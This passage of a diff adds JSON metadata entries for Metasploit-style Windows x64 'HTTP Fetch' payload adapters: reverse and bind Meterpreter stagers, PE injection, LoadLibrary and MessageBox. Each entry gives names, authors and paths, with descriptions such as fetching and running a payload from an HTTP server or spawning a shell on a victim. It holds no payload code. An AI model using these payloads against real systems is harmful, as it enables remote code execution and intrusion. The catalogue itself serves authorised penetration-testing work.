"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/http/x64/loadlibrary": { + "name": "HTTP Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/http/x64/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/http/x64/messagebox": { + "name": "HTTP Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/http/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "pasta " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_tcp_rc4": { + "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_http": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_http", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_https": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_https", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_named_pipe": { + "name": "HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_rc4": { + "name": "HTTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_winhttp": { + "name": "HTTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/http/x64/meterpreter/reverse_winhttps": { + "name": "HTTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/http/x64/meterpreter_bind_named_pipe": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_bind_tcp": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_http": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_https": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/http/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/peinject/bind_named_pipe": { 